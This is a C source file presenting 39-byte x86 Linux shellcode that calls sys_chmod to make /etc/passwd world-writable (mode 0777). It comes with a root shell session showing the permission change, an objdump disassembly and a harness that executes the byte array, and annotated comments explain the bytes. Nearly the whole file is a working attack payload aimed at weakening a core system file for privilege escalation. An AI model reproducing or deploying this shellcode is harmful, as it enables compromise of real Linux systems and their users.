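/*
Title     : change mode 0777 of "/etc/passwd" with sys_chmod syscall
Name      : 39 bytes sys_chmod("/etc/passwd",599) x86 linux shellcode
Date      : may, 31 2009
Author    : gunslinger_
Web       : devilzc0de.com
blog      : gunslingerc0de.wordpress.com
tested on : linux debian
*/

/*
root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd
-rw-r--r-- 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost:/home/gunslinger/shellcode# gcc -o chmod chmod.c
chmod.c: In function ‘main’:
chmod.c:37: warning: incompatible implicit declaration of built-in function ‘strlen’
root@localhost:/home/gunslinger/shellcode# ./chmod
Length: 39
root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd
-rwxrwxrwx 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost:/home/gunslinger/shellcode# chmod 644 /etc/passwd
root@localhost:/home/gunslinger/shellcode# ls -la /etc/passwd
-rw-r--r-- 1 root root 1869 2010-05-08 15:53 /etc/passwd
root@localhost:/home/gunslinger/shellcode# objdump -d chmod

chmod:     file format elf32-i386

Disassembly of section .text:

08048060 <.text>:
 8048060:   eb 15                   jmp    0x8048077
 8048062:   31 c0                   xor    %eax,%eax
 8048064:   b0 0f                   mov    $0xf,%al
 8048066:   5b                      pop    %ebx
 8048067:   31 c9                   xor    %ecx,%ecx
 8048069:   66 b9 ff 01             mov    $0x1ff,%cx
 804806d:   cd 80                   int    $0x80
 804806f:   31 c0                   xor    %eax,%eax
 8048071:   b0 01                   mov    $0x1,%al
 8048073:   31 db                   xor    %ebx,%ebx
 8048075:   cd 80                   int    $0x80
 8048077:   e8 e6 ff ff ff          call   0x8048062
 804807c:   2f                      das
 804807d:   65                      gs
 804807e:   74 63                   je     0x80480e3
 8048080:   2f                      das
 8048081:   70 61                   jo     0x80480e4
 8048083:   73 73                   jae    0x80480f8
 8048085:   77 64                   ja     0x80480eb
root@localhost:/home/gunslinger/shellcode#
*/

#include <stdio.h>
#include <string.h>   /* strlen(): the original build left it implicitly declared (warning above) */

/*
 * Payload bytes, matching the objdump listing above:
 *   - jmp / call pair: the call pushes the address of the trailing
 *     "/etc/passwd" bytes, which `pop %ebx` takes as the path argument;
 *   - eax = 0xf (sys_chmod), ecx = 0x1ff (mode 0777 octal), int $0x80;
 *   - eax = 1 (sys_exit), ebx = 0, int $0x80.
 * The 39 bytes contain no NUL, so strlen() reports the full length; the
 * terminating NUL of the path string is the one the C initializer appends
 * after the last byte of the array.
 * The chmod result is not checked: control goes straight to sys_exit whether
 * or not the call succeeded. The session above runs as root; for a root-owned
 * file the call fails with EPERM for an unprivileged caller.
 * NOTE(review): the "599" in the Name line does not match the encoded mode
 * 0x1ff (= 0777 octal, 511 decimal); the -rwxrwxrwx output above agrees with
 * 0777, so "599" looks like a typo in the title.
 */
char sc[] =
    "\xeb\x15\x31\xc0\xb0\x0f\x5b\x31\xc9\x66\xb9\xff\x01\xcd\x80"
    "\x31\xc0\xb0\x01\x31\xdb\xcd\x80"
    "\xe8\xe6\xff\xff\xff"
    "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";

/*
 * Harness: prints the payload length, then transfers control into the byte
 * array.
 *
 * Because the payload ends with sys_exit(0), `return 0` is only reached if the
 * jump into the array never happens.
 * NOTE(review): the indirect call needs the array to be mapped executable; on
 * a toolchain that maps writable data non-executable it faults instead of
 * running - confirm against the build flags used for the run above.
 */
int main(void)
{
    /* strlen() returns size_t; "%d" with a size_t argument is a format
     * mismatch, so use "%zu". */
    fprintf(stdout, "Length: %zu\n", strlen(sc));

    /* Object-pointer to function-pointer conversion is not portable C, but it
     * is what this harness has always relied on; kept as in the original. */
    void (*payload)(void) = (void (*)(void))sc;
    payload();

    return 0;
}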